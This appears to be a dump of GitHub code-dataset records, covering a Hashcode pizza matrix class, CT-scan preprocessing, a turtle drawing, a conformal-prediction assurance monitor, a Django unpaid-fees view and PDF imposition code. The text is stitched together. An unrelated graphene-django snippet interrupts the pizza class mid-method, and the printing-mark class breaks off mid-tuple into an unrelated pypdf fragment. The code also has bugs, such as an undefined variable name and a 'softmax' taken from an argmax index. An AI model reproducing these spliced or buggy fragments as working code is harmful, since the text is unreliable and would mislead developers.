Team.\"\"\"\n\n def __init__(self, people):\n self.people = people\n self.pizzas = []\n self.weight = 1\n\n def __repr__(self):\n pizzas = \"\".join(\"%s, \" % repr(x) for x in self.pizzas)\n return f\"{self.__class__.__name__}%d(\" % self.people + pizzas[:-2] + \")\"\n\n def __str__(self):\n return f\"{self.people} \" + \" \".join(\"%d\" % x.idx for x in self.pizzas)\n\n #@property\n #def\n\n\nclass CustomMtx(object):\n \"\"\"docstring for CustomMtx.\"\"\"\n\n def __init__(self, Pizza_list = []):\n super(CustomMtx, self).__init__()\n\n self.y_axis = []\n self.x_axis = []\n aux = []\n\n idx = 0\n for p in Pizza_list:\n self.x_axis.append([idx, p])\n idx += 1\n aux.extend(p.ingr)\n\n len_x = len(self.x_axis)\n aux = dict.fromkeys(aux)\n for key in aux.keys():\n aux[key] = [False]*len_x\n for it in range(len_x):\n for ing in self.x_axis[it][1].ingr:\n aux[ing][it] = True\n\n self.mtx = []\n keys, values = [], []\n for x,y in aux.items():\n keys.append(x)\n values.append(y)\n\n for idx in range(len(keys)):\n self.y_axis.append([idx, keys[idx], values[idx].count(True)])\n\n for it in range(len_x):\n self.mtx.append([])\n for i in range(len(self.y_axis)):\n self.mtx[it].append(values[i][it])\n\n def pop_xl(self, i = []):\n # return pizzas, not PizzaTuple\n i.sort()\n res = []\n for value in range(len(i)):\n res.append(self.x_axis.pop(i[value] - value)[1])\n return res\n\n # COSTOSO!\n def 
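The converter registrations above map custom Django model fields to graphene types; the same registration hook works for any field class, sketched here with a hypothetical ColorField (the field class and its String mapping are illustrative, not part of this codebase):

import graphene
from django.db import models
from graphene_django.converter import convert_django_field

class ColorField(models.CharField):
    """Hypothetical custom model field storing a hex colour string."""

@convert_django_field.register(ColorField)
def convert_color_field(field, registry=None):
    # Expose the custom field as a plain String in the GraphQL schema.
    return graphene.String(description=field.help_text, required=not field.null)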
print(self):\n row_format = \"{:>6}\" * (len(self.y_axis)+1)\n ingr_list = [(x[1][:2] + '..') if len(x[1]) > 3 else x[1] for x in self.y_axis] #\n ingr_list.insert(0, \" \")\n str = row_format.format(*ingr_list) + \"\\n\"\n for x in self.x_axis:\n ingr = self.mtx[x[0]]\n aux = []\n for y in self.y_axis:\n if ingr[y[0]]:\n aux.append(\"X\")\n else:\n aux.append(\" \")\n row_format = \"p{:<6}\" + \"{:>6}\" * len(self.y_axis)\n str = str + row_format.format(x[1].idx, *aux) + \"\\n\"\n return str\n\n def extend_xaxis_pizzaWeight(self):\n aux = {}\n len_y = len(self.y_axis)\n for x in range(len_y):\n aux[self.y_axis[x][1]] = x\n\n aux2 = []\n for PizzaTuple in self.x_axis:\n val = 0\n for ing in PizzaTuple[1].ingr:\n if aux[ing] > val:\n val = aux[ing]\n PizzaTuple.append(self.mtx[PizzaTuple[0]].count(True)*len_y)#+val)\n aux2.append(PizzaTuple)\n self.x_axis = aux2\n","repo_name":"Uncastellum/Hashcode","sub_path":"Practice-2021/PizzaMtx.py","file_name":"PizzaMtx.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26592044740","text":"import nibabel as nib\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n# https://www.kaggle.com/kmader/show-3d-nifti-images\nimport numpy as np\nimport tqdm as tqdm\n\ndata_path = './sample/data'\nlabel_path = './sample/label'\ndata_file_list = sorted(os.listdir(data_path))\nlabel_file_list = sorted(os.listdir(label_path))\n\nivh = 0\nich = 0\n\nfor d in range(len(data_file_list)):\n\n ct_path = './sample/data/'+data_file_list[d]\n ct = nib.load(ct_path)\n ct = ct.get_fdata()\n\n mask_path = './sample/label/'+label_file_list[d]\n mask = nib.load(mask_path)\n mask = mask.get_fdata()\n\n ct = np.transpose(ct,(2,0,1))\n mask = np.transpose(mask,(2,0,1))\n\n # ct data slice\n ct = ct[:32, :512, :512]\n mask = mask[:32, :512, :512]\n\n c, w, h = ct.shape\n if w!=512 or h!=512:\n print(data_file_list[d])\n\n if c < 32:\n z_padding = 32-c\n ct = np.pad(ct, ((0, z_padding), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, z_padding), (0, 0), (0, 0)), 'constant')\n\n for i in range(len(ct)):\n ct[i] = np.where(ct[i] < 0, 0, ct[i])\n ct[i] = np.where(ct[i] > 140, 255, ct[i])\n ct[i] = np.where(ct[i] == 255, ct[i]/140*255, ct[i])\n\n c_path = './sample_preprocessing/data/' + data_file_list[d][:3]\n m_path = './sample_preprocessing/label/' + label_file_list[d][:4]\n\n # print(m_path, i+1)\n # print(np.where(mask[i] == 1, True, False).sum())\n\n # ich_check = np.where(mask[i] == 1, True, False)\n # if ich_check.sum() != 0:\n # ich += 1\n #\n # ivh_check = np.where(mask[i] == 2, True, False)\n # if ivh_check.sum() != 0:\n # print(m_path, i+1)\n # ivh += 1\n\n if not os.path.exists(c_path):\n os.makedirs(c_path)\n if not os.path.exists(m_path):\n os.makedirs(m_path)\n\n c_path2 = c_path + '/{:03d}.png'.format(i+1)\n m_path2 = m_path + '/m{:03d}.png'.format(i+1)\n\n\n # cv2.imwrite(c_path2, ct[i])\n # cv2.imwrite(m_path2, mask[i])\n\n # # 시각화해서 검증시\n plt.imsave(c_path2, ct[i])\n plt.imsave(m_path2, mask[i])\n\n","repo_name":"WonJunPark/brain_ct_to_rgb","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15762005172","text":"import turtle\n\n\nnum = int(input(\"cantidad\"))\na = turtle.Turtle()\na.speed(0)\na.hideturtle()\nscreen = turtle.Screen()\n\n\n\n\n\n\nact = 1\nfor i in range(num):\n for 
x in range(act):\n for p in range(2):\n a.dot(4)\n a.forward(5)\n a.left(90)\n act += 1\n\nscreen.exitonclick()\n","repo_name":"Tormenta88/pitoncode","sub_path":"A1C1/TrabajoDiscreta/tryingspirals.py","file_name":"tryingspirals.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20507587495","text":"#!/usr/bin/python\nimport os\nimport sys\nimport pickle\nimport collections\nimport numpy as np\nfrom scipy import stats\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import backend as K\nimport tensorflow as tf\nfrom selective_classification_config import Config as SConfig\n\n\nclass ICAD():\n\n def __init__(self, folder_path, num_classes, window_size=0):\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n tf.get_logger().setLevel('INFO')\n\n physical_devices = tf.config.list_physical_devices('GPU')\n try:\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\n except:\n pass\n\n self.num_classes = num_classes\n self.window_size = window_size\n\n self.model_path = folder_path\n self.classifier_model = None\n self.siamese_model = None\n self.calibration_nc = None\n self.centroids = None\n self.a_s = 0.9\n self.b_s = -0.3\n self.threshold_s = -0.145\n self.a_c = 0\n self.b_c = 0\n self.theshold_c = 0\n self.comb_type = None\n self.comb_function = None\n self.comb_am_config = None\n self.p_values = None\n self.use_sequence = False\n self.config = SConfig(self.model_path)\n self.best_correct_ratio_params = []\n self.best_no_decision_ratio_params = []\n\n print('model path', self.model_path)\n\n lec_weights_path = os.path.join(self.model_path, \"classifier_model.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"..\", \"classifier_model.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"model_weights.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"..\", \"model_weights.h5\")\n\n nc_calibration_path = os.path.join(\n self.model_path, \"calibration_nc_scores.pickle\")\n siamese_model_path = os.path.join(self.model_path, \"siamese_model.h5\")\n snapshot_parameter_path = os.path.join(\n self.model_path, \"snapshot.pickle\")\n sequence_parameter_path = os.path.join(\n self.model_path, \"sequence.pickle\")\n\n msg = \"\"\n if (not os.path.exists(lec_weights_path)):\n msg += \" LEC Weights\"\n if (not os.path.exists(siamese_model_path)):\n msg += \" Siamese Model\"\n if (not os.path.exists(nc_calibration_path)):\n msg += \" Calibration Score\"\n if (not os.path.exists(snapshot_parameter_path)):\n msg += \" a,b, threshold values\"\n\n if msg:\n complete_msg = 'Cannot load assurance monitor. Missing - '+msg\n raise ValueError(complete_msg)\n self.siamese_model = load_model(siamese_model_path)\n self.classifier_model = self.load_network(\n self.model_path, lec_weights_path)\n\n if (self.classifier_model is None):\n raise ValueError(\"Cannot load classifier network\")\n\n with open(nc_calibration_path, \"rb\") as f:\n self.calibration_nc, self.centroids = pickle.load(f)\n\n if os.path.exists(snapshot_parameter_path):\n with open(snapshot_parameter_path, \"rb\") as f:\n self.a_s, self.b_s, self.threshold_s = pickle.load(f)\n else:\n print (\n 'Cannot find snapshot_parameters.pickle. 
using default snapshot parameters')\n\n if os.path.exists(sequence_parameter_path):\n with open(sequence_parameter_path, \"rb\") as f:\n\n self.best_correct_ratio_params, self.best_no_decision_ratio_params = pickle.load(\n f)\n print(self.best_correct_ratio_params)\n self.window_size = self.best_correct_ratio_params[0]\n self.comb_type = self.best_correct_ratio_params[1]\n self.comb_function = self.best_correct_ratio_params[2]\n self.a_c = self.best_correct_ratio_params[3]\n self.b_c = self.best_correct_ratio_params[4]\n self.threshold_c = self.best_correct_ratio_params[5]\n self.use_sequence = True\n self.load_sequence_configurations(self.model_path)\n # print(self.a_c)\n # print(self.b_c)\n # print(self.threshold_c)\n else:\n print ('Cannot find sequence_parameters.pickle. Not using sequence am')\n\n # Snapshot p vales:\n self.p_values = np.empty(self.num_classes)\n\n if (self.window_size):\n # self.p_value_window = = np.empty(self.window_size, self.num_classes)\n self.p_value_window = collections.deque(maxlen=self.window_size)\n self.conf_window = collections.deque(maxlen=self.window_size)\n self.cred_window = collections.deque(maxlen=self.window_size)\n else:\n self.p_value_window = None\n self.conf_window = None\n self.cred_window = None\n\n #self.a_s = 0.9\n #self.b_s = -0.3\n # self.threshold_s = 0.6#-0.145\n # print(self.threshold_c)\n #self.threshold_c = 0.6\n\n sys.setrecursionlimit(40000)\n\n def load_network(self, model_path, lec_weights_path):\n import imp\n print('model_path ', model_path)\n network_path = os.path.join(model_path, \"LECModel.py\")\n\n if (not os.path.exists(network_path)):\n network_path = os.path.join(model_path, '..', 'LECModel.py')\n if (os.path.exists(network_path)):\n print('network_path ', network_path)\n if (os.path.exists(lec_weights_path)):\n self.netpath = network_path\n mods = imp.load_source('LEC_Model', network_path)\n if ('get_model' in dir(mods)):\n net = mods.get_model()\n net.load_weights(lec_weights_path)\n print('loaded weights from {0}'.format(lec_weights_path))\n return net\n else:\n print ('cannot load weights from {0}'.format(lec_weights_path))\n return None\n\n def load_sequence_configurations(self, model_path):\n import imp\n comb_am_config_path = os.path.join(model_path, \"comb_am_config.py\")\n print('comb_am_config_path', comb_am_config_path)\n if (not os.path.exists(comb_am_config_path)):\n comb_am_config_path = os.path.join(\n model_path, \"..\", \"comb_am_config.py\")\n if (os.path.exists(comb_am_config_path)):\n mods = imp.load_source('comb_am_config', comb_am_config_path)\n if ('Config' in dir(mods)):\n self.comb_am_config = mods.Config()\n\n def evaluate(self, lec_input):\n # if (self.thresholds == None):\n # raise ValueError(\"Threshold value is not set\")\n #print('thresholds {}, {}'.format(self.threshold_s,self.threshold_c))\n\n # compute embedding representation using the siamese network\n test_emb = self.siamese_model.predict(lec_input)\n prediction = np.argmax(self.classifier_model.predict(\n lec_input)) # LEC's classification\n softmax = np.max(prediction) # LEC's classification softmax value\n\n p_values = np.empty(self.num_classes)\n centroid_distances = np.zeros(self.num_classes)\n for j in range(self.num_classes):\n centroid_distances[j] = np.linalg.norm(\n test_emb - self.centroids[j])\n for j in range(self.num_classes):\n temp_nc = centroid_distances[j] / float(\n np.min(centroid_distances[np.arange(len(centroid_distances)) != j]))\n p_values[j] = np.count_nonzero(self.calibration_nc >= temp_nc) / float(\n 
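load_network() above pulls LECModel.py in with imp.load_source, and the imp module is removed in Python 3.12; the standard importlib replacement is a drop-in sketch:

import importlib.util

def load_source(module_name, path):
    # importlib equivalent of the deprecated imp.load_source
    spec = importlib.util.spec_from_file_location(module_name, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module

# mods = load_source("LEC_Model", network_path)
# net = mods.get_model() if hasattr(mods, "get_model") else None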
len(self.calibration_nc)) # Compute a p-value for each class\n # Credibility for the classification\n credibility = p_values[prediction]\n # Confidence for the classification\n confidence = 1 - \\\n np.max(p_values[np.arange(len(p_values)) != prediction])\n\n decisions = {}\n decisions[\"comb\"] = 0\n decisions[\"snapshot\"] = 0\n\n self.p_values = p_values\n am_output = self.a_s * credibility + self.b_s * confidence\n\n #print(\"{}, {}, {}\".format(self.a_s, self.b_s, self.threshold_s))\n\n if am_output >= self.threshold_s: # Can we make a decision?\n decisions[\"snapshot\"] = 1.0\n\n if (self.use_sequence):\n # Combining p values:\n\n combined_am_output = 0 # initial value\n\n self.p_value_window.append(p_values)\n self.conf_window.append(confidence)\n self.cred_window.append(credibility)\n\n # if sliding window is full\n #print (\" {}, {} \".format(len(self.p_value_window),self.window_size))\n if len(self.p_value_window) == self.window_size:\n # Do the p value combination\n adjusted_p = self.config.combining_functions[self.comb_type][self.comb_function](\n np.array(self.p_value_window))\n p_values_sort = np.sort(adjusted_p)\n # Compute credibility and confidence:\n prediction_credibility = p_values_sort[-1]\n prediction_confidence = p_values_sort[-1] - p_values_sort[-2]\n # Compute combined AM output\n combined_am_output = self.a_c * prediction_credibility + \\\n self.b_c * prediction_confidence\n decisions[\"comb\"] = 1 if combined_am_output > self.threshold_c else 0\n # print(self.threshold_c)\n # print(combined_am_output)\n\n # print(decisions)\n\n return [self.p_values, prediction, credibility, confidence, decisions, am_output, softmax, combined_am_output]\n\n def get_p_values(self):\n return self.p_values\n\n def clear_windows(self):\n if (self.window_size):\n self.p_value_window.clear()\n self.conf_window.clear()\n self.cred_window.clear()\n\n def update_snapshot_params(self, **kwargs):\n self.threshold_s = kwargs.get('am_threshold', self.threshold_s)\n print('updated snapshot threshold {}'.format(self.threshold_s))\n\n def update_sequence_params(self, **kwargs):\n user_choice = kwargs.get('user_choice', 'trained_best')\n\n if (user_choice == 'trained_best'):\n return\n\n if (user_choice == 'override_threshold'):\n self.threshold_c = kwargs.get('am_s_threshold', self.threshold_c)\n print('updated sequence threshold {}'.format(self.threshold_c))\n return\n\n if (user_choice == 'override_all'):\n window_size = kwargs.get('window_size', self.window_size)\n comb_type = kwargs.get('comb_type', self.comb_type)\n comb_function = kwargs.get('comb_function', self.comb_function)\n found_trained_parameters = False\n if (self.comb_am_config and self.comb_am_config.coeffs):\n for coeff in self.comb_am_config.coeffs:\n if window_size == coeff[0]:\n if comb_type == coeff[1]:\n if comb_function == coeff[2]:\n self.a_c = coeff[3]\n self.b_c = coeff[4]\n self.threshold_c = coeff[5]\n self.comb_type = comb_type\n self.comb_function = comb_function\n self.window_size = window_size\n found_trained_parameters = True\n break\n self.threshold_c = kwargs.get('am_s_threshold', self.threshold_c)\n\n if found_trained_parameter:\n print('overriding sequence parameters based on user choice')\n else:\n print(\n 'Could not find a,b values for user choice of window size, comb type, comb function. 
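evaluate() above derives inductive-conformal p-values by ranking each test nonconformity score against the calibration scores; the core computation, sketched with synthetic scores (here prediction stands in for the classifier's argmax):

import numpy as np

rng = np.random.default_rng(1)
calibration_nc = rng.exponential(1.0, size=500)  # nonconformity scores, calibration set
test_nc = np.array([0.2, 1.5, 4.0])              # per-class scores for one test input

# p-value = fraction of calibration scores at least as nonconforming as the test score
p_values = np.array([(calibration_nc >= nc).mean() for nc in test_nc])
prediction = int(np.argmin(test_nc))             # class with the most conforming score
credibility = p_values[prediction]
confidence = 1 - np.max(np.delete(p_values, prediction))
print(p_values, prediction, credibility, confidence)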
Reverting to best trained.')\n\n print('best trained type: {} function: {} window size: {}'.format(\n self.comb_type, self.comb_function, self.window_size))\n print('user choice type: {} function: {} window size: {}'.format(\n comb_type, comb_function, window_size))\n\n print('using sequence parameters a: {} b: {} threshold: {}'.format(\n self.a_c, self.b_c, self.threshold_c))\n del self.p_value_window\n del self.conf_window\n del self.cred_window\n\n self.p_value_window = collections.deque(maxlen=self.window_size)\n self.conf_window = collections.deque(maxlen=self.window_size)\n self.cred_window = collections.deque(maxlen=self.window_size)\n","repo_name":"AbLECPS/alc","sub_path":"alc_utils/assurance_monitor/icad_selective_classification.py","file_name":"icad_selective_classification.py","file_ext":"py","file_size_in_byte":12869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74739575529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom accounts.models import Student\nfrom accounts.serializers import StudentSerializer\nfrom payment.models import Payment\nfrom paymenttype.models import PaymentType, TuitionFee\nfrom paymentwaving.models import WavedPayment\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef student_unpaid_list(request):\n req = request.GET\n response = []\n pay_status = {\n 'p_first': False,\n 'p_second': False,\n 'p_total': False\n }\n college = ''\n dept = ''\n major = ''\n level = ''\n if request.GET.get('college'):\n college = req['college']\n if request.GET.get('dept'):\n dept = req['dept']\n if request.GET.get('major'):\n major = req['major']\n if request.GET.get('level'):\n level = req['level']\n\n if college == '' and dept == '' and major == '' and level == '':\n students = Student.objects.all().exclude(status='8')\n if college == '' and dept == '' and major == '' and level != '':\n students = Student.objects.filter(level=level)\n if college != '' and dept == '' and major == '' and level == '':\n students = Student.objects.filter(major__dept__college=college)\n if college != '' and dept == '' and major == '' and level != '':\n students = Student.objects.filter(major__dept__college=college, level=level)\n if dept != '' and major == '' and level == '':\n students = Student.objects.filter(major__dept=dept)\n if dept != '' and major == '' and level != '':\n students = Student.objects.filter(major__dept=dept, level=level)\n if major != '' and level == '':\n students = Student.objects.filter(major=major)\n if major != '' and level != '':\n students = Student.objects.filter(major=major, level=level)\n \n for student in students:\n payment_type = PaymentType.objects.get(pk=req['payment_type'])\n payment_wavings = WavedPayment.objects.filter(student=student.id)\n payments = Payment.objects.filter(student=student.id,\n payment_type=req['payment_type'],\n session=req['session'])\n\n try:\n payment_wavings.get(level=req['level'], payment_type=payment_type.id)\n in_wavings = True\n except WavedPayment.DoesNotExist:\n in_wavings = False\n\n if payment_type.tuition:\n tuition = TuitionFee()\n if student.programme_type == \"Full Time\":\n if student.mode_of_entry.name == \"JME\":\n tuition = TuitionFee.objects.get(major=student.major.id, jme=True, ft=True)\n if student.mode_of_entry.name == \"D/E\":\n 
tuition = TuitionFee.objects.get(major=student.major.id, de=True, ft=True)\n if student.mode_of_entry.name == \"D/E 300\":\n tuition = TuitionFee.objects.get(major=student.major.id, conversion=True, ft=True)\n\n if student.programme_type == \"Part Time\":\n if student.mode_of_entry.name == \"JME\":\n tuition = TuitionFee.objects.get(major=student.major.id, jme=True, pt=True)\n if student.mode_of_entry.name == \"D/E\":\n tuition = TuitionFee.objects.get(major=student.major.id, de=True, pt=True)\n if student.mode_of_entry.name == \"D/E 300\":\n tuition = TuitionFee.objects.get(major=student.major.id, conversion=True, pt=True)\n tuition_payments = payments.filter(payment_type__tuition=True,\n paid=True,\n session=req['session'])\n try:\n level = tuition_payments[0].level.level\n except IndexError:\n level = ''\n t_payments_total = 0\n for pay in tuition_payments:\n t_payments_total += pay.amount\n\n if t_payments_total >= int(tuition.first):\n pay_status['p_first'] = True\n if t_payments_total >= int(tuition.second):\n pay_status['p_second'] = True\n if t_payments_total >= int(tuition.total):\n pay_status['p_total'] = True\n obj = {\n 'student': StudentSerializer(student).data,\n 'pay_status': pay_status,\n 'paid': pay_status['p_total'],\n 'amount': t_payments_total,\n 'owing': tuition.total - t_payments_total,\n 'level': level\n }\n if not pay_status['p_total'] and not in_wavings:\n response.append(obj)\n else:\n try:\n Payment.objects.get(student=student.id, payment_type=req['payment_type'], session=req['session'],\n paid=True)\n except Payment.DoesNotExist:\n if not in_wavings:\n obj = {\n 'student': StudentSerializer(student).data,\n 'owing': payment_type.amount\n }\n response.append(obj)\n \n return Response(response)\n","repo_name":"GHostEater/Portal","sub_path":"payment/views/student_unpaid_list.py","file_name":"student_unpaid_list.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13092077991","text":"from __future__ import annotations\n\n# Python standard\nimport tempfile\nfrom copy import copy\nimport io\nfrom math import floor\n\n# Type hint\nfrom typing import Union, Callable, List, Tuple, Dict, Literal\nfrom types import FunctionType\nfrom io import BytesIO, FileIO\n\n# PDF\nimport PyPDF2 as pypdf\nfrom reportlab.pdfgen.canvas import Canvas\n\n# Project modules\nfrom booklet.core.manuscript import Modifier, Template, Manuscript\nfrom booklet.converters import SigComposition\nimport vailidation\nfrom booklet.utils.misc import *\n\n\n# sample class for example\nclass Sample(Template):\n __name__ = \"Sample\"\n __description__ = \"Sample Template works\"\n\n @property\n def name(self):\n return Sample.__name__\n\n @property\n def description(self):\n return Sample.__description__\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n def generate_template(self, *args):\n pass\n\n def do(self, index: int, manuscript: Manuscript, file_mode):\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n # generation process\n\n new_pdf.write(new_file)\n manuscript.pdf_update(new_pdf, new_file)\n\n\nclass Imposition(Template):\n __name__ = \"Imposition\"\n __description__ = \"Imposition work\"\n\n @property\n def name(self):\n return Imposition.__name__\n\n @property\n def description(self):\n return Imposition.__description__\n\n def __init__(\n self,\n imposition: bool = True,\n gap: int = 0, # pts\n proof: bool = 
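The branch ladder at the top of this view builds a separate queryset for every filter combination; accumulating keyword filters collapses it to one query. A sketch using the same field paths (it also applies the status exclusion uniformly, which the original only does in the unfiltered branch):

def filter_students(request):
    # Accumulate only the filters that were actually supplied.
    filters = {}
    if request.GET.get("college"):
        filters["major__dept__college"] = request.GET["college"]
    if request.GET.get("dept"):
        filters["major__dept"] = request.GET["dept"]
    if request.GET.get("major"):
        filters["major"] = request.GET["major"]
    if request.GET.get("level"):
        filters["level"] = request.GET["level"]
    return Student.objects.exclude(status="8").filter(**filters)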
False,\n proof_color: Tuple[float, float, float, float] = (0, 0, 0, 0),\n proof_width: Union[None, int] = None,\n imposition_layout: Union[Tuple[int, int], SigComposition] = (4, 1),\n ):\n\n super().__init__(direction=True)\n\n self.imposition = bool(imposition)\n self.gap = gap if vailidation.check_integer(gap, positive=True) else 0\n self.proof = proof if type(proof) == bool else False\n self.proof_color = self.___get_cmyk(proof_color)\n self.proof_width = self.gap if proof_width == None else proof_width\n self.layout = (\n imposition_layout.layout\n if isinstance(imposition_layout, SigComposition)\n else imposition_layout\n )\n self.pages_per_template = (\n self.layout[0] * self.layout[1] if self.layout != None else 1\n )\n\n def rule(\n self, i: int\n ) -> list: # i = template page, list = manuscript pages unordered\n _i = i * self.pages_per_template\n _f = (i + 1) * self.pages_per_template\n return list(range(_i, _f))\n\n def position(self, i: int) -> tuple[float, float]: # manuscript page\n index = i % self.pages_per_template\n column = self.layout[1]\n row = self.layout[0]\n\n x = (index) % column\n y = row - floor((index) / column) - 1\n x_pos = (self.manuscript_format[0] + self.gap) * x - (\n self.gap if x > column - 1 else 0\n )\n y_pos = (self.manuscript_format[1] + self.gap) * y - (\n self.gap if y > row - 1 else 0\n )\n\n return (x_pos, y_pos)\n\n # Internal routines\n def ___get_cmyk(self, color) -> Tuple[float, float, float, float]:\n if type(color) == str:\n return Conversion.hex_to_cmyk(color)\n if len(color) == 3:\n return Conversion.hex_to_cmyk(Conversion.rgb_to_hex(color))\n elif len(color) == 4:\n return color\n\n def generate_template(self, paper_width, paper_height, template_pages):\n tem_pdf_byte = io.BytesIO()\n template_proof = Canvas(tem_pdf_byte, pagesize=(paper_width, paper_height))\n\n proof_height = 2 * self.manuscript_format[1] / template_pages\n proof_width = self.proof_width\n # position\n x_center = self.manuscript_format[0] + self.gap / 2\n x_position = x_center - proof_width / 2\n y_position = paper_height - proof_height\n proof_position = [x_position, y_position]\n c, m, y, k = self.proof_color\n template_proof.setLineWidth(0)\n template_proof.setFillColorCMYK(c, m, y, k)\n\n heights = []\n\n for i in range(0, template_pages):\n heights.append(proof_position[1])\n if i % 2 == 0:\n template_proof.setLineWidth(0)\n template_proof.setFillColorCMYK(c, m, y, k)\n template_proof.rect(\n proof_position[0],\n proof_position[1],\n proof_width,\n proof_height,\n fill=1,\n )\n proof_position[1] -= proof_height\n template_proof.showPage()\n\n template_proof.save()\n tem_pdf_byte.seek(0)\n proof_templates = pypdf.PdfReader(tem_pdf_byte)\n\n for i in range(0, template_pages):\n proof_page = proof_templates.pages[i]\n proof_page.mediabox.setLowerLeft((proof_position[0], heights[i]))\n proof_page.mediabox.setUpperRight(\n (proof_position[0] + proof_width, heights[i] + proof_height)\n )\n\n return proof_templates, tem_pdf_byte\n\n def do(self, index: int, manuscript: Manuscript, file_mode=\"safe\"):\n\n if not self.imposition:\n return 0\n\n new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n self.manuscript_format = manuscript.file_paper_format\n paper_width = (self.manuscript_format[0] + self.gap) * self.layout[1] - (\n self.gap\n )\n paper_height = (self.manuscript_format[1] + self.gap) * self.layout[0] - (\n self.gap\n )\n format = (paper_width, paper_height)\n\n manuscript_pages = len(manuscript.pages)\n pages_per_template = 
self.pages_per_template\n\n template_pages = int(manuscript_pages / pages_per_template) + (\n 1 if bool(manuscript_pages % pages_per_template) else 0\n )\n\n for i in range(0, template_pages):\n new_pdf.add_blank_page(format[0], format[1])\n\n for i in range(0, template_pages):\n manu_pages = self.index_mapping(manuscript, i, template_pages)\n\n tem_page = new_pdf.pages[i]\n for j in manu_pages:\n page = manuscript.pages[j]\n x, y = self.position_mapping(manuscript, j, manuscript.file_pages)\n\n tx = x\n ty = y\n\n page_translate = pypdf.Transformation().translate(tx=tx, ty=ty)\n page.add_transformation(page_translate)\n page.mediaBox.setLowerLeft((tx, ty))\n upr = (tx + self.manuscript_format[0], ty + self.manuscript_format[1])\n page.mediaBox.setUpperRight(upr)\n\n tem_page.merge_page(page)\n\n if self.proof:\n proof_templates, temp_file = self.generate_template(\n paper_width, paper_height, template_pages\n )\n for i in range(0, template_pages):\n page = new_pdf.pages[i]\n page.merge_page(proof_templates.pages[i])\n\n new_pdf.write(new_file)\n manuscript.meta[\"/Imposition\"] = f\"{self.layout[0]}x{self.layout[1]}\"\n manuscript.pdf_update(new_pdf, new_file)\n\n\nclass PrintingMark(Template):\n __name__ = \"printing mark\"\n __desciprtion__ = \"Add printing marks to manuscript\"\n\n @property\n def name(self):\n return PrintingMark.__name__\n\n @property\n def description(self):\n return PrintingMark.__desciprtion__\n\n def __init__(\n self,\n on: bool = False,\n margin: int = 43, # pts\n crop: bool = True,\n reg: bool = True,\n cmyk: bool = True,\n ):\n\n self.on = on if type(on) == bool else False\n self.margin = margin if margin != None else 43\n self.crop = bool(crop)\n self.reg = bool(reg)\n self.cmyk = bool(cmyk)\n\n super().__init__(direction=True)\n\n def ____basic_position(\n self, pagesize: Tuple[float, float]\n ) -> Tuple[\n Tuple[float, float, float, float], Tuple[Tuple[float, float, float, float]]\n ]:\n x1 = self.margin * 0.25\n x2 = self.margin + pagesize[0] + x1\n y1 = self.margin + pagesize[1]\n y2 = self.margin\n\n x3 = y2\n x4 = x2 - x1\n y3 = x1\n y4 = y1 + y3\n\n return [[x1, x2, x3, x4], [y1, y2, y3, y4]]\n\n def __get_paper_dim(self, pagesize: Tuple[float, float]) -> Tuple[float, float]:\n width, height = pagesize\n x = 2 * self.margin + width\n y = 2 * self.margin + height\n return x, y\n\n def __draw_crop_lines(self, canvas: Canvas, positions: list = []) -> bool:\n if self.crop:\n if len(positions) == 0:\n positions = self.___get_crop_line_positions(self.manu_paper_format)\n canvas.setLineWidth(0.5 * mm)\n canvas.lines(positions)\n return True\n return False\n\n def __draw_registration(\n self, canvas: Canvas, ratio: float = 0.8, positions: list = []\n ) -> bool:\n self.reg_l = 0\n pagesize = self.manu_paper_format\n if self.reg:\n self.reg_l = l = ratio * self.margin\n center = self.margin / 2\n if len(positions) == 0:\n positions = self.___get_registeration_positions(l, center, pagesize)\n for position in positions:\n self.___draw_registration_mark(\n canvas=canvas, x=position[0], y=position[1], l=l\n )\n return True\n return False\n\n def __draw_color_marker(self, canvas: Canvas) -> bool:\n if self.cmyk:\n cyan = [(0.2 * (1 + i), 0, 0, 0) for i in range(0, 5)]\n magenta = [(0, 0.2 * (1 + i), 0, 0) for i in range(0, 5)]\n yellow = [(0, 0, 0.2 * (1 + i), 0) for i in range(0, 5)]\n black = [(0, 0, 0, 0.2 * (1 + i)) for i in range(0, 5)]\n\n color_sequence = [\n (1, 0, 0, 0),\n (1, 1, 0, 0),\n (0, 1, 0, 0),\n (0, 1, 1, 0),\n (0, 0, 1, 0),\n (1, 0, 1, 0),\n (1, 0, 
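Imposition.do above positions each manuscript page with a pypdf Transformation before merging it onto the larger sheet; the core N-up step, sketched on blank stand-in pages:

import PyPDF2 as pypdf

src = pypdf.PdfWriter()
pages = [src.add_blank_page(width=100, height=150) for _ in range(2)]  # stand-ins

out = pypdf.PdfWriter()
sheet = out.add_blank_page(width=200, height=150)  # one 2x1 sheet, no gap

for i, page in enumerate(pages):
    # Shift each source page into its slot before merging onto the sheet.
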